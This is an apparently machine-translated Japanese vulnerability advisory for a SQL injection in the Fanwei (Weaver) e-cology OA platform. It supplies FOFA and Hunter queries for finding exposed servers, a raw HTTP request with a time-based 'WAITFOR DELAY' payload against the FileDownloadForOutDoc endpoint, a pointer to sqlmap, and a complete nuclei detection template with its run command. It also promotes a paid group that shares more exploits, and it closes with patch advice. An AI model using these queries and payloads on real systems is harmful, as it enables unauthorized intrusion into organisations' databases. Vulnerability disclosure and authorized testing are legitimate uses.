0x01 読書メモ
Tianqing Attack and Defense Laboratory の技術記事は参考用であり、この記事で提供される情報は、ネットワーク セキュリティ担当者が責任を負う Web サイト、サーバーなど (これらに限定されない) をテストまたは保守するためだけに提供されます。記事内の技術情報は、あらゆるコンピュータ システムへの侵入に使用されますので、無断で使用しないでください。本記事で提供する情報を利用したことによって生じた直接的または間接的な結果および損失は利用者ご自身が負担するものとします。この記事で提供されているツールは学習のみを目的としており、それ以外の使用は禁止されています。!!
0x02 脆弱性の説明
(1) ファンウェイ電子コロジー
Fanwei e-cology は、Fanwei Network Technology が開発した共同管理プラットフォームで、人事、財務、管理、モバイル オフィスの多機能管理をサポートします。この脆弱性は、Fanwei e-cology がユーザー入力を効果的にフィルタリングせず、SQL クエリ ステートメントに直接接続したため、システムに SQL インジェクションの脆弱性が発生したことが原因です。
FOFA 構文:
app.name=="泛微 e-cology 9.0 OA"
ハンター構文:
app.name="泛微 e-cology 9.0 OA"
app.name="泛微 e-cology OA"
(2) 脆弱性 poc
POST /weaver/weaver.file.FileDownloadForOutDoc HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36 Edg/89.0.774.68
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Referer: 127.0.0.1:9999/wui/index.html
Content-Type: application/x-www-form-urlencoded
Accept-Language: zh-CN,zh;q=0.9
Content-Length: 45
fileid=2+WAITFOR DELAY+'0:0:5'&isFromOutImg=1
sqlmapを使用して注入する
核スキャンスクリプト
ソース: https://github.com/UltimateSec/ultimaste-nuclei-templates/blob/main/ecology-oa/ecology-oa-filedownloadforoutdoc-sqli.yaml
id: ecology-oa-filedownloadforoutdoc-sqli
info:
name: EcologyOA filedownloadforoutdoc - SQL injection
author: unknown
severity: critical
description: EcologyOA filedownloadforoutdoc interface has SQL injection
tags: ecology-oa,sqli
requests:
- raw:
- |
POST /weaver/weaver.file.FileDownloadForOutDoc HTTP/1.1
Host: { {Hostname}}
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
fileid=2+WAITFOR DELAY+'0:0:5'&isFromOutImg=1
matchers:
- type: dsl
dsl:
- 'duration>=5'
./nuclei -u http://oa.xxx.com/ -t ./ultimaste-nuclei-templates/ecology-oa/ecology-oa-filedownloadforoutdoc-sqli.yaml
Knowledge Planet でさらなる脆弱性 POC がリリース
地球に関する最近のテーマと、地球内のツールのデモンストレーション
Inner Planet メンバーの発送
Web セキュリティの脆弱性に関する最新の 1 日の共有脆弱性マイニング スキルの共有
惑星に参加して、ナレッジプラネットAPPで天慶攻防研究所を検索してください。さらにエキサイティングなので、ご期待ください
0x03 修復計画
公式修正による緩和策
パッチリンク
-
修理の提案
公式は修復提案を発表し、影響を受けるユーザーにはできるだけ早く最新バージョンのパッチ v10.58.0 にアップグレードすることを推奨しています。
ダウンロード アドレス: https://www.weaver.com.cn/cs/securityDownload.asp#